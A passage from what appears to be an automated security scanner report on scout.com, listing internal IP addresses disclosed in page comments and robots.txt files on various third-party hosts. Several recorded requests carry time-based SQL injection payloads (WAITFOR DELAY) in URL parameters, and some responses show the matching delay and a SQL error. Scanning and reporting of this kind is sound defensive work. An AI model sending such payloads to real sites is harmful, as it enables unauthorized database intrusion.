Cookie: RefId=0; BrandId=0; SessionBrandId=0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Fri, 06 May 2011 19:59:13 GMT
Content-Type: text/html; charset=utf-8
Expires: Fri, 06 May 2011 20:09:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
X-Streamed: from 192.168.20.181 in 252 ms
Vary: Accept-Encoding
Content-Length: 24961

<!-- An exception occurred. Described as: Incorrect syntax near '0'.
Unclosed quotation mark after the character string '--,4811607,null,null,null,null,null,null,null,null'.--><!DOCTYPE html
P
...[SNIP]...
<!--
v. 0.0.0.12737
Server Date: Friday, May 06, 2011 12:59:12 PM
URL: http://192.168.20.181:80/Legacy/a.z?s=143&p=9&c='%3bWAITFOR+DELAY+'0%3a0%3a25'--&cid=1037787&nid=4811607&fhn=1
Server IP: 192.168.20.72, SANDPOINT
Page Execution Time: 187 ms
-->
...[SNIP]...
<!-- streamed by server (SCOUTWEB5) from url (http://192.168.20.181/Legacy/a.z?s=143&p=9&c='%3bWAITFOR+DELAY+'0%3a0%3a25'--&cid=1037787&nid=4811607&fhn=1) in 253 ms. DateTime = 5/6/2011 12:59:13 PM -->
28.175. http://www.scout.com/a.z  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /a.z

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /a.z?s=143&p=9&c=1;WAITFOR%20DELAY%20%270:0:25%27--&cid=1037787&nid=4811607&fhn=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.scout.com
Cookie: RefId=0; BrandId=0; SessionBrandId=0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Fri, 06 May 2011 19:59:38 GMT
Content-Type: text/html; charset=utf-8
Expires: Fri, 06 May 2011 20:09:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
X-Streamed: from 192.168.20.181 in 25,176 ms
Vary: Accept-Encoding
Content-Length: 24808

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Football Recruiting</title>
<meta http-eq
...[SNIP]...
<!--
v. 0.0.0.12737
Server Date: Friday, May 06, 2011 12:59:38 PM
URL: http://192.168.20.181:80/Legacy/a.z?s=143&p=9&c=1%3bWAITFOR+DELAY+'0%3a0%3a25'--&cid=1037787&nid=4811607&fhn=1
Server IP: 192.168.20.76, DRAVUS
Page Execution Time: 25,159 ms
-->
...[SNIP]...
<!-- streamed by server (SCOUTWEB5) from url (http://192.168.20.181/Legacy/a.z?s=143&p=9&c=1%3bWAITFOR+DELAY+'0%3a0%3a25'--&cid=1037787&nid=4811607&fhn=1) in 25,177 ms. DateTime = 5/6/2011 12:59:38 PM -->
28.176. http://www.scout.com/a.z  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /a.z

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

POST /a.z?s=143&p=9&c=2&cid=1037787&nid=4811607&fhn=1&sSeasonYears=4214902 HTTP/1.1
Referer: http://www.scout.com/a.z?s=143&p=9&c=2&cid=1037787&nid=4811607&fhn=1&sSeasonYears=4214902
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.scout.com
Cookie: RefId=0; BrandId=0; SessionBrandId=0
Accept-Encoding: gzip, deflate
Content-Length: 61

__VIEWSTATE=%2fwEPDwULLTEzNzQyNzE0MDlkZA%3d%3d&q=Search+Scout

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Fri, 06 May 2011 19:57:57 GMT
Content-Type: text/html; charset=utf-8
Expires: Fri, 06 May 2011 20:07:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
Vary: Accept-Encoding
Content-Length: 27051

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Zack Williams Profile</title>
<meta http
...[SNIP]...
<!--
v. 0.0.0.12737
Server Date: Friday, May 06, 2011 12:57:57 PM
URL: http://www.scout.com:80/Legacy/a.z?s=143&p=9&c=2&cid=1037787&nid=4811607&fhn=1&sSeasonYears=4214902
Server IP: 192.168.20.71, SCOUTWEB5
Page Execution Time: 209 ms
-->
...[SNIP]...
28.177. http://www.scout.com/a.z  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /a.z

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /a.z?s=%27;WAITFOR%20DELAY%20%270:0:25%27--&p=9&c=2&cid=1037787&nid=4811607&fhn=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.scout.com
Cookie: RefId=0; BrandId=0; SessionBrandId=0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Fri, 06 May 2011 19:58:01 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb9
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
X-Streamed: from 192.168.20.181 in 4 ms
Cache-Control: public, s-maxage=600
Expires: Fri, 06 May 2011 20:08:01 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
<!--
Fetch info:
Source: 192.168.10.106
URL: http://192.168.10.106/a.z?s=143&p=26&cfg=HTTP404&fromprefetch=1
By: -1
Date: 5/5/2011 4:50:07 PM
-->
...[SNIP]...
<!--
v. 0.0.0.12737
Server Date: Thursday, May 05, 2011 4:50:07 PM
URL: http://192.168.10.106:80/Legacy/a.z?s=143&p=26&cfg=HTTP404&fromprefetch=1
Server IP: 192.168.20.92, CHERRY
Page Execution Time: 31 ms
-->
...[SNIP]...
<!-- streamed by server (SCOUTWEB9) from url (http://192.168.20.181/Legacy/a.z?s='%3bWAITFOR+DELAY+'0%3a0%3a25'--&p=9&c=2&cid=1037787&nid=4811607&fhn=1) in 4 ms. DateTime = 5/6/2011 12:58:01 PM -->
28.178. http://www.scout.com/a.z  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /a.z

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

POST /a.z?s=143&p=9&c=2&cid=1037787&nid=4811607&fhn=1&sSeasonYears=4811607 HTTP/1.1
Referer: http://www.scout.com/a.z?s=143&p=9&c=2&cid=1037787&nid=4811607&fhn=1&sSeasonYears=4811607
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.scout.com
Cookie: RefId=0; BrandId=0; SessionBrandId=0
Accept-Encoding: gzip, deflate
Content-Length: 61

__VIEWSTATE=%2fwEPDwULLTEzNzQyNzE0MDlkZA%3d%3d&q=Search+Scout

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Fri, 06 May 2011 19:57:57 GMT
Content-Type: text/html; charset=utf-8
Expires: Fri, 06 May 2011 20:07:57 GMT
Server: Microsoft-IIS/6.0
Server: Sodo
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
Vary: Accept-Encoding
Content-Length: 27046

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Zack Williams Profile</title>
<meta http
...[SNIP]...
<!--
v. 0.0.0.12737
Server Date: Friday, May 06, 2011 12:57:57 PM
URL: http://www.scout.com:80/Legacy/a.z?s=143&p=9&c=2&cid=1037787&nid=4811607&fhn=1&sSeasonYears=4811607
Server IP: 192.168.20.64, SODO
Page Execution Time: 588 ms
-->
...[SNIP]...
28.179. http://www.scout.com/a.z  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /a.z

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

POST /a.z?s=143&p=9&c=1;WAITFOR%20DELAY%20%270:0:25%27--&cid=1037787&nid=4811607&fhn=1 HTTP/1.1
Referer: http://www.scout.com/a.z?s=143&p=9&c=2&cid=1037787&nid=4811607&fhn=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.scout.com
Cookie: RefId=0; BrandId=0; SessionBrandId=0
Accept-Encoding: gzip, deflate
Content-Length: 61

__VIEWSTATE=%2fwEPDwULLTEzNzQyNzE0MDlkZA%3d%3d&q=Search+Scout

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Fri, 06 May 2011 19:59:39 GMT
Content-Type: text/html; charset=utf-8
Expires: Fri, 06 May 2011 20:09:14 GMT
Server: Microsoft-IIS/6.0
Server: Summit
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
Vary: Accept-Encoding
Content-Length: 24602

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Football Recruiting</title>
<meta http-eq
...[SNIP]...
<!--
v. 0.0.0.12737
Server Date: Friday, May 06, 2011 12:59:39 PM
URL: http://www.scout.com:80/Legacy/a.z?s=143&p=9&c=1%3bWAITFOR+DELAY+'0%3a0%3a25'--&cid=1037787&nid=4811607&fhn=1
Server IP: 192.168.20.90, SUMMIT
Page Execution Time: 25,209 ms
-->
...[SNIP]...
28.180. http://www.scout.com/a.z  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /a.z

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /a.z?s=143&p=9&c=2&cid=1037787&nid=4811607&fhn=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.scout.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Fri, 06 May 2011 19:57:48 GMT
Content-Type: text/html; charset=utf-8
Expires: Fri, 06 May 2011 20:07:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
X-Streamed: from 192.168.20.181 in 6 ms
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Vary: Accept-Encoding
Content-Length: 27171

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Zack Williams Profile</title>
<meta http
...[SNIP]...
<!--
v. 0.0.0.12737
Server Date: Friday, May 06, 2011 12:57:47 PM
URL: http://192.168.20.181:80/Legacy/a.z?s=143&p=9&c=2&cid=1037787&nid=4811607&fhn=1
Server IP: 192.168.20.70, STONE
Page Execution Time: 140 ms
-->
...[SNIP]...
<!-- streamed by server (SCOUTWEB5) from url (http://192.168.20.181/Legacy/a.z?s=143&p=9&c=2&cid=1037787&nid=4811607&fhn=1) in 6 ms. DateTime = 5/6/2011 12:57:48 PM -->
28.181. http://www.scout.com/a.z  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /a.z

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /a.z?s=143&p=9&c=2&cid=1037787&nid=4811607&fhn=1&sSeasonYears=4214902 HTTP/1.1
Referer: http://www.scout.com/a.z?s=143&p=9&c=2&cid=1037787&nid=4811607&fhn=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.scout.com
Cookie: RefId=0; BrandId=0; SessionBrandId=0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Fri, 06 May 2011 19:57:54 GMT
Content-Type: text/html; charset=utf-8
Expires: Fri, 06 May 2011 20:07:54 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb9
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
X-Streamed: from 192.168.20.181 in 430 ms
Vary: Accept-Encoding
Content-Length: 27244

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Zack Williams Profile</title>
<meta http
...[SNIP]...
<!--
v. 0.0.0.12737
Server Date: Friday, May 06, 2011 12:57:54 PM
URL: http://192.168.20.181:80/Legacy/a.z?s=143&p=9&c=2&cid=1037787&nid=4811607&fhn=1&sSeasonYears=4214902
Server IP: 192.168.20.75, SCOUTWEB8
Page Execution Time: 334 ms
-->
...[SNIP]...
<!-- streamed by server (SCOUTWEB9) from url (http://192.168.20.181/Legacy/a.z?s=143&p=9&c=2&cid=1037787&nid=4811607&fhn=1&sSeasonYears=4214902) in 431 ms. DateTime = 5/6/2011 12:57:54 PM -->
28.182. http://www.scout.com/a.z  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /a.z

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /a.z?s=1;WAITFOR%20DELAY%20%270:0:25%27--&p=9&c=2&cid=1037787&nid=4811607&fhn=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.scout.com
Cookie: RefId=0; BrandId=0; SessionBrandId=0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Fri, 06 May 2011 19:58:02 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
X-Streamed: from 192.168.20.181 in 65 ms
Cache-Control: public, s-maxage=600
Expires: Fri, 06 May 2011 20:08:01 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
<!--
Fetch info:
Source: 192.168.10.106
URL: http://192.168.10.106/a.z?s=143&p=26&cfg=HTTP404&fromprefetch=1
By: -1
Date: 5/5/2011 4:50:07 PM
-->
...[SNIP]...
<!--
v. 0.0.0.12737
Server Date: Thursday, May 05, 2011 4:50:07 PM
URL: http://192.168.10.106:80/Legacy/a.z?s=143&p=26&cfg=HTTP404&fromprefetch=1
Server IP: 192.168.20.92, CHERRY
Page Execution Time: 31 ms
-->
...[SNIP]...
<!-- streamed by server (SCOUTWEB2) from url (http://192.168.20.181/Legacy/a.z?s=1%3bWAITFOR+DELAY+'0%3a0%3a25'--&p=9&c=2&cid=1037787&nid=4811607&fhn=1) in 65 ms. DateTime = 5/6/2011 12:58:02 PM -->
28.183. http://www.scout.com/a.z  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /a.z

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

POST /a.z?s=143&p=9&c=2&cid=1037787&nid=4811607&fhn=1 HTTP/1.1
Referer: http://www.scout.com/a.z?s=143&p=9&c=2&cid=1037787&nid=4811607&fhn=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.scout.com
Cookie: RefId=0; BrandId=0; SessionBrandId=0
Accept-Encoding: gzip, deflate
Content-Length: 61

__VIEWSTATE=%2fwEPDwULLTEzNzQyNzE0MDlkZA%3d%3d&q=Search+Scout

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Fri, 06 May 2011 19:57:50 GMT
Content-Type: text/html; charset=utf-8
Expires: Fri, 06 May 2011 20:07:49 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
Vary: Accept-Encoding
Content-Length: 27005

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Zack Williams Profile</title>
<meta http
...[SNIP]...
<!--
v. 0.0.0.12737
Server Date: Friday, May 06, 2011 12:57:50 PM
URL: http://www.scout.com:80/Legacy/a.z?s=143&p=9&c=2&cid=1037787&nid=4811607&fhn=1
Server IP: 192.168.20.93, SCOUTWEB1
Page Execution Time: 467 ms
-->
...[SNIP]...
28.184. http://www.scout.com/search.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /search.aspx

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /search.aspx HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1303516031.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; SessionBrandId=0; __utma=202704078.454375544.1303509265.1304728142.1304731683.5; __utmc=202704078; UnicaNIODID=Jwu5zEjpq0Q-W60ACS9; __utmb=202704078.2.9.1304732669570;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 06 May 2011 20:44:57 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb10
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14458

<!-- Start frame cache output for cachekey = (s=143&p=9&c=999.header) --><!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<ht
...[SNIP]...
<!--
v. 0.0.0.12737
Server Date: Friday, May 06, 2011 1:44:57 PM
URL: http://192.168.20.181:80/Legacy/a.z?s=143&p=9&c=1&GetFrames=634402862969986125&NoRedir=1
Server IP: 192.168.20.74, SCOUTWEB7
Page Execution Time: 240 ms
-->
...[SNIP]...
29. Robots.txt file  previous  next
There are 97 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

29.1. http://381-kpd-482.mktoresp.com/webevents/visitWebPage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://381-kpd-482.mktoresp.com
Path:   /webevents/visitWebPage

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 381-kpd-482.mktoresp.com

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:20:54 GMT
Server: Apache
Last-Modified: Thu, 28 Apr 2011 23:21:22 GMT
ETag: "1998d35-18-4a202d0b50080"
Accept-Ranges: bytes
Content-Length: 24
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
29.2. http://4qinvite.4q.iperceptions.com/1.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://4qinvite.4q.iperceptions.com
Path:   /1.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 4qinvite.4q.iperceptions.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 26
Content-Type: text/plain
Last-Modified: Wed, 27 Feb 2008 16:52:38 GMT
Accept-Ranges: bytes
ETag: "b1c52f296179c81:9fa"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Srv-By: 4Q-INVITE2
Date: Fri, 06 May 2011 18:40:00 GMT
Connection: close

User-agent: *
Disallow: /
29.3. http://797-pwy-691.mktoresp.com/webevents/visitWebPage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://797-pwy-691.mktoresp.com
Path:   /webevents/visitWebPage

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 797-pwy-691.mktoresp.com

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:20:51 GMT
Server: Apache
Last-Modified: Thu, 28 Apr 2011 23:21:22 GMT
ETag: "7621c3-18-4a202d0b50080"
Accept-Ranges: bytes
Content-Length: 24
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
29.4. http://a.rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a.rad.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: text/plain
Last-Modified: Thu, 14 Apr 2011 22:28:58 GMT
Accept-Ranges: bytes
ETag: "0b18f58f3facb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Access-Control-Allow-Origin: *
Date: Fri, 06 May 2011 20:28:08 GMT
Connection: keep-alive
Content-Length: 28

User-agent: *
Disallow: /
29.5. http://ad.doubleclick.net/adj/scmag.hmktus/sc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/scmag.hmktus/sc

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Fri, 06 May 2011 21:50:02 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /
29.6. http://admin.instantservice.com/resources/smartbutton/5371/II_Servers.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admin.instantservice.com
Path:   /resources/smartbutton/5371/II_Servers.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: admin.instantservice.com

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 18:39:58 GMT
Server: Apache
Last-Modified: Tue, 22 Mar 2011 14:43:25 GMT
ETag: "1a-443ebd40"
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/plain; charset=iso-8859-1

User-agent: *
Disallow: /
29.7. http://ads.allatsea.net/www/delivery/spcjs.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.allatsea.net
Path:   /www/delivery/spcjs.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ads.allatsea.net

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:17:36 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch
Last-Modified: Tue, 14 Sep 2010 21:25:55 GMT
ETag: "12cdc2-17a-4903edbb09ec0"
Accept-Ranges: bytes
Content-Length: 378
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# This robots.txt file requests that search engines and other
# automated web-agents don't try to index the files in this
# directory (/). This file is required in the event that you
# use OpenX witho
...[SNIP]...
29.8. http://adsfac.us/ag.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adsfac.us
Path:   /ag.asp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: adsfac.us

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 30 Sep 2008 00:31:21 GMT
Accept-Ranges: bytes
ETag: "e5e89cdc9322c91:0"
Server: Microsoft-IIS/7.0
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Date: Sat, 07 May 2011 01:50:17 GMT
Connection: close
Content-Length: 26

User-agent: *
Disallow: /
29.9. http://allatsea.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://allatsea.net
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: allatsea.net

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:06:36 GMT
Server: Apache/2.0.52 (CentOS)
Last-Modified: Fri, 07 Sep 2007 08:06:25 GMT
ETag: "7880d58-17-1d7de240"
Accept-Ranges: bytes
Content-Length: 23
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
29.10. http://altfarm.mediaplex.com/ad/js/16228-124632-16454-0  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/16228-124632-16454-0

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"26-1289502470000"
Last-Modified: Thu, 11 Nov 2010 19:07:50 GMT
Content-Type: text/plain
Content-Length: 26
Date: Fri, 06 May 2011 21:50:13 GMT
Connection: keep-alive

User-agent: *
Disallow: /
29.11. http://api.facebook.com/restserver.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.facebook.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: text/plain; charset=utf-8
Expires: Sun, 05 Jun 2011 21:06:49 GMT
X-FB-Server: 10.32.12.125
Connection: close
Content-Length: 24

User-agent: *
Disallow:
29.12. http://apnxscm.ac3.msn.com:81/CACMSH.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apnxscm.ac3.msn.com:81
Path:   /CACMSH.ashx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: apnxscm.ac3.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/plain
Expires: Sat, 07 May 2011 20:02:52 GMT
Last-Modified: Sat, 02 Apr 2011 00:47:24 GMT
Accept-Ranges: bytes
ETag: "1CBF0CF87F3F600"
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Fri, 06 May 2011 20:02:52 GMT
Connection: close
Content-Length: 70

# Keep all robots out of entire web site
User-agent: *
Disallow: /
29.13. http://apps.sapha.com/appshandler.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apps.sapha.com
Path:   /appshandler.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: apps.sapha.com

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:05:43 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 11 Dec 2008 02:36:27 GMT
ETag: "d309a75-28-3e4840c0"
Accept-Ranges: bytes
Content-Length: 40
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

# robots.txt
User-agent: *
Disallow: /
29.14. http://as.casalemedia.com/j  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as.casalemedia.com
Path:   /j

Issue detail
